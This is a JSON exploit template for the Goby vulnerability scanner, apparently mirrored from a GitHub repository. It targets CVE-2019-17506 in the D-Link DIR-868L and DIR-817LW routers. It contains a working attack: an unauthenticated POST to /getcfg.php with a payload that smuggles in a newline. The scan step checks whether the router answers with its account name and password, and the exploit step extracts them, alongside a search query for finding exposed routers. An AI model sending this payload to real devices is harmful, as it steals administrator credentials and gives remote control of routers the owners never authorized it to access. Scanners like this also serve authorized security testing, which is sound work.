mirror of https://github.com/qwqdanchun/Goby.git
103 lines
4.0 KiB
JSON
103 lines
4.0 KiB
JSON
{
|
|
"Name": "Dlink Info Leak CVE-2019-17506",
|
|
"Level": "2",
|
|
"Tags": [
|
|
"infoleak"
|
|
],
|
|
"GobyQuery": "app=\"D_Link-Router\"",
|
|
"Description": "There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.",
|
|
"Product": "Dlink",
|
|
"Homepage": " http://www.dlink.com.cn/",
|
|
"Author": "aetkrad",
|
|
"Impact": "",
|
|
"Recommendation": "",
|
|
"References": [
|
|
"https://xz.aliyun.com/t/6453"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": null,
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "POST",
|
|
"uri": "/getcfg.php",
|
|
"follow_redirect": false,
|
|
"header": {
|
|
"Content-Type": "application/x-www-form-urlencoded"
|
|
},
|
|
"data_type": "text",
|
|
"data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "<name>",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "<password>",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|regex|"
|
|
]
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "POST",
|
|
"uri": "/getcfg.php",
|
|
"follow_redirect": false,
|
|
"header": {
|
|
"Content-Type": "application/x-www-form-urlencoded"
|
|
},
|
|
"data_type": "text",
|
|
"data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody||"
|
|
]
|
|
}
|
|
],
|
|
"PostTime": "2021-11-26 19:19:16",
|
|
"GobyVersion": "1.9.310"
|
|
} |